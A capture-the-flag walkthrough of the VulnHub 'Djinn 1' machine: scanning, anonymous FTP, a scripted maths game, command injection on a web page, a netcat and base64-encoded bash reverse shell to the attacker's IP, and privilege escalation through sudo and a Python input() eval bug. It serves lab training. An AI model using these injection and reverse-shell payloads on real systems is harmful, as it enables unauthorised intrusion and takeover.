Djinn_1-(VULNHUB)

VM download (VulnHub): https://download.vulnhub.com/djinn/djinn.ova

root@kali:~/Downloads# nmap -A 192.168.135.133
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 08:46 GMT
Nmap scan report for 192.168.135.133
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.135.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:0A:82:9C (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.135.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds

root@kali:~/Downloads# ftp 192.168.135.133
Connected to 192.168.135.133.
220 (vsFTPd 3.0.3)
Name (192.168.135.133:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
226 Directory send OK.

ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (5.9316 kB/s)

ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.00 secs (420.8754 kB/s)

ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (422.8029 kB/s)

root@kali:~/Downloads# cat creds.txt
nitu:81299

root@kali:~/Downloads# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.

root@kali:~/Downloads# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

root@kali:~/Downloads# nc 192.168.135.133 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|

Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '+', 9)
> 15
(8, '*', 6)
> 48
(6, '+', 5)
> 11
(8, '/', 5)
> 1
(5, '/', 7)
> .7
(2, '*', 9)
> 18
(6, '*', 2)
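Answering 1000 questions by hand is not practical, so the game is scripted. The client below is an added example, not part of the original walkthrough: it reads the "(a, 'op', b)" lines exactly as printed above and sends the result after each "> " prompt. Assumptions (not stated on the page): the server's quotes are plain ASCII apostrophes (the curly quotes above are a rendering artifact), the accepted answer is Python's own result for the expression (so 8/5 is answered as 1.6), and a "-" operator may appear even though the transcript only shows +, * and /.

```python
import operator
import re
import socket

# Operators the game has shown (+, *, /); "-" is included as an assumption.
OPS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}

# One challenge line looks like:  (6, '+', 9)
QUESTION = re.compile(r"\((-?\d+),\s*'([-+*/])',\s*(-?\d+)\)")


def solve(line):
    """Return the answer to send for one challenge line, or None if the line is not a question."""
    m = QUESTION.search(line)
    if m is None:
        return None
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    result = OPS[op](a, b)
    # Whole numbers are sent without a trailing ".0"; 8/5 is sent as 1.6.
    # Assumption: the server compares against Python's own result for the expression.
    if isinstance(result, float) and result.is_integer():
        result = int(result)
    return str(result)


def answer_stream(text):
    """Split buffered server output into (answers, leftover).

    Every question that is already followed by its "> " prompt is answered; the
    text after the last answered prompt is returned so a half-received line can
    be completed by the next recv().
    """
    answers = []
    while True:
        m = QUESTION.search(text)
        if m is None:
            break
        prompt = text.find("> ", m.end())
        if prompt == -1:
            break
        answers.append(solve(m.group(0)))
        text = text[prompt + 2:]
    return answers, text


def play(host, port, timeout=5.0):
    """Connect to the game, answer until the server stops asking, return (count, final text)."""
    answered = 0
    pending = ""
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            pending += chunk.decode("utf-8", errors="replace")
            answers, pending = answer_stream(pending)
            for a in answers:
                s.sendall((a + "\n").encode())
                answered += 1
    # Whatever is left unanswered is the server's last message (the prize after 1000 answers).
    return answered, pending


if __name__ == "__main__":
    n, final = play("192.168.135.133", 1337)
    print(f"answered {n} questions")
    print(final)
```

The banner text never matches the question pattern, so it is simply kept in the buffer until the first question arrives; whatever the server prints after the last prompt is returned as the final message.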

In the browser open

http://192.168.135.133:7331/

Neither 1337 nor 7331 (1337 reversed) is in nmap's default top-1000 port list, which is why the scan above lists only 21 and 22; a full-range scan (nmap -p- 192.168.135.133) shows both.

Now, in another terminal, brute-force directories on the web service:

root@kali:~/Downloads# gobuster dir -u http://192.168.135.133:7331 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.135.133:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/12/01 08:54:14 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2019/12/01 08:54:31 Finished
===============================================================

In the browser open

http://192.168.135.133:7331/genie

http://192.168.135.133:7331/wish

The /wish page takes a command in its execute field and runs it on the server. Submitting

execute : id

returns

output : uid=33(www-data) gid=33(www-data) groups=33(www-data)

so the web application executes whatever is entered, as www-data.

on terminal

root@kali:~/Downloads# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

In the browser, submit on /wish:

execute : nc -e /bin/sh 192.168.135.128 1234

click on submit

and nothing connects back to the listener: this one-liner does not give a shell.

Now try the bash reverse shell instead, base64-encoded so that the text submitted to /wish is only a base64 string plus the pipe that decodes and runs it:

bash -i >& /dev/tcp/192.168.135.128/1234 0>&1

encoded in base64 and fed back through a decoder into bash:

execute : echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMjgvODA4MCAwPiYx | base64 -d | bash

Two caveats. A bare echo of the encoded string only prints it; the "| base64 -d | bash" part is what actually runs the decoded command. And the string above decodes to "bash -i >& /dev/tcp/192.168.135.128/8080 0>&1", i.e. port 8080, not the 1234 the listener is on: either listen with nc -nlvp 8080, or re-encode the one-liner with port 1234, which gives YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMjgvMTIzNCAwPiYx.

click submit

we get the shell

www-data@djinn:/opt/80$ whoami

www-data@djinn:/opt/80$ ls

www-data@djinn:/opt/80$ cat app.py

www-data@djinn:/opt/80$ cd /home

www-data@djinn:/home$ cd nitish/.dev/

www-data@djinn:/home/nitish/.dev$ bash

www-data@djinn:/home/nitish/.dev$ python -c 'import pty;pty.spawn("/bin/sh")'

su refuses to run without a terminal, so the pty is spawned first and the user switch is done from it:

$ su nitish
Password: p4ssw0rdStr3t0n9

nitish@djinn:~/.dev$ whoami

nitish@djinn:~/.dev$ sudo -l

nitish@djinn:~/.dev$ genie

nitish@djinn:~/.dev$ genie -h

nitish@djinn:~/.dev$ sudo -u sam genie -cmd new

$ whoami

$ bash

sam@djinn:~/.dev$ sudo -l

sam@djinn:~/.dev$ sudo -u root /root/lago

Enter your choice : 2

Enter your number : num

# whoami

# bash
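Typing the word "num" where a number is expected and being accepted is the behaviour of a program that evaluates its input instead of parsing it. lago's source is not shown on this page; the reading assumed here is that the guess is read with Python 2's input(), which evaluates the typed text as an expression, so "num" (the name of the variable holding the secret) compares equal to the secret itself. The snippet below is an added example, not lago's code: guess_py2_style reproduces that check in Python 3 with an explicit eval, and guess_hardened shows the parse that closes it.

```python
import random

SECRET = random.randint(1, 101)  # the number the player is supposed to guess


def guess_py2_style(typed, num):
    """Mimic a check that reads the guess with Python 2's input().

    Assumption for this example: the guess is evaluated as an expression and then
    compared with num. The typed text "num" therefore evaluates to the secret and
    always matches. Builtins are removed here to keep the demo inert; the real
    input() has them, which is arbitrary code execution, not just a bypass.
    """
    try:
        value = eval(typed, {"__builtins__": {}}, {"num": num})
    except Exception:
        return False
    return value == num


def guess_hardened(typed, num):
    """Parse the guess as an integer; anything that is not a number is just a wrong guess."""
    try:
        value = int(typed.strip())
    except ValueError:
        return False
    return value == num


if __name__ == "__main__":
    for typed in ["42", "num", "num*1", "__import__('os')"]:
        print(f"{typed!r:20} py2-style={guess_py2_style(typed, SECRET)!s:5} "
              f"hardened={guess_hardened(typed, SECRET)}")
```

With the hardened parse the only way to win is to type the right number; the variable name, an expression over it, or an import attempt all fail with a plain "wrong guess".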

root@djinn:~/dev# su root

root@djinn:/home/nitish/.dev# cd

root@djinn:~# ls

root@djinn:~# ./proof.sh

@SAKSHAM DIXIT